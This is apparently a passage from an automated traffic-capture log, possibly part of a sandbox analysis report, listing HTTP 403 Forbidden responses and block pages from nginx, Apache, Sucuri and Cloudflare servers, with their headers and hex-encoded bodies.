                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:00 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:00 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:52:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:01 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TGMayTjY90ZSy9MuU9L0ecgOTvEX8p2LEiuusO%2FKjlrbpr7937XeUlufMfudUi1e%2BR8mDugnzEk8D5IEVC27QSRP1Uz4tD%2BnE6OgoGlJ2JJGKPiiHYRYndXXW0A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a07c9679962-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:01 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jrkM%2FW6sPHcCB%2B68jmHxVdw%2F2FI68cuAp0MSbX861dl5D%2BRn7e8Sr4lW7vPeBwA7pq1%2B25G052OM2yaBrAqHJ%2BOwGglZkDuoPv8IkrDiEX3FplV%2BcUMYCXXA5Ifz6%2Bo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a080c861cab-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6k9NWPW51m7YZmW2%2BAadOEatF3E%2BI8x9BGWbP3sRZbfrFX%2BduGeme%2FNy0dgYMx1Tw0GIY51qi0QZoDaaJDbJfmd8Wx44Y%2Banf4WkwiKOOnB0fls2%2BEqTbZM%2Fe%2FyG7%2Fg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a088d381cab-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:52:17 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HQ1sYFs2Bj6sAk0G5LpAcUyxHz6pnA%2F8vzlQqFuezooqcs2FSdo5Eol%2B%2Fg74ry%2Bphd2LEVjMh9qxX2wJriD2M2M33M74FxgUZd%2B%2BYN%2FP5%2BPlF8PLUsO4QGsufXVS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a0a2fd4381b-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e Data Ascii: 11a2<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type"
